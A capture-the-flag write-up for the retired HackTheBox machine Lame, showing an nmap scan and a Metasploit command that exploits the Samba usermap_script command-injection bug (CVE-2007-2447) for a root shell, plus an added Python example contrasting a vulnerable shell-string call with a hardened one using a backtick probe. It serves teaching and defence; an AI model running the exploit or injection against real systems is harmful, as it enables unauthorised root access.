⚠️ Lame is a retired HackTheBox machine, so this writeup is safe to publish.

Overview

Lame is one of the oldest and easiest boxes on HackTheBox. Root comes directly from an unauthenticated command-injection vulnerability in Samba (CVE-2007-2447, the usermap_script bug), so there is no separate privilege-escalation step.

Recon

nmap -sC -sV -p- -oA nmap/lame 10.10.10.3

Key open ports:

Port  Service
21    vsftpd 2.3.4
22    OpenSSH
139   Samba 3.0.20
445   Samba 3.0.20

Samba 3.0.20 is vulnerable to the username map script command execution flaw.

[Figure: nmap output]

Exploitation

The username field is passed to a shell unsanitised, so we can inject a command by wrapping it in backticks. The Metasploit usermap_script module does this for us:

msfconsole -q -x "use exploit/multi/samba/usermap_script; \
  set RHOSTS 10.10.10.3; set LHOST tun0; run"

This drops straight into a root shell — no privesc required.

Flags

Flag  Value
user  REDACTED
root  REDACTED

Lessons Learned

  • Always version-check network services; ancient Samba/vsftpd builds carry known RCEs.
  • The Samba usermap_script bug is a textbook example of unsanitised input reaching a shell.
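
The bug class from the last bullet, shown as a vulnerable pattern beside its fix. This is an added example, not part of the original writeup and not Samba's code: the stand-in map script, the function names, the harmless probe string and the username allowlist are all assumptions made for illustration.

```python
import re
import shlex
import subprocess
import sys

# Hypothetical stand-in for a configured map script: it prints its first argument.
SCRIPT = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

# Constructed probe: harmless command substitution that only echoes a marker.
PROBE = "`echo INJECTED`"

# Assumed allowlist policy for account names; adjust to the site's naming rules.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def map_username_shell(username: str) -> str:
    """Vulnerable pattern: the name is spliced into a line that /bin/sh parses."""
    script = " ".join(shlex.quote(part) for part in SCRIPT)
    # Double quotes do not help: the shell still expands backticks inside them.
    command = f'{script} "{username}"'
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout.strip()


def map_username_argv(username: str) -> str:
    """Hardened pattern: no shell, the name is one argv element, never parsed."""
    done = subprocess.run(SCRIPT + [username], capture_output=True, text=True)
    return done.stdout.strip()


def is_safe_username(username: str) -> bool:
    """Defence in depth: reject anything outside the allowlist before use."""
    return SAFE_USERNAME.fullmatch(username) is not None


if __name__ == "__main__":
    for name in ("alice", PROBE):
        print(f"input={name!r}")
        print(f"  shell string -> {map_username_shell(name)!r}")
        print(f"  argv list    -> {map_username_argv(name)!r}")
        print(f"  allowlisted  -> {is_safe_username(name)}")
```

With the shell-string version the script receives the output of the substituted command instead of the name it was given; with the argv version it receives the backticks as literal characters.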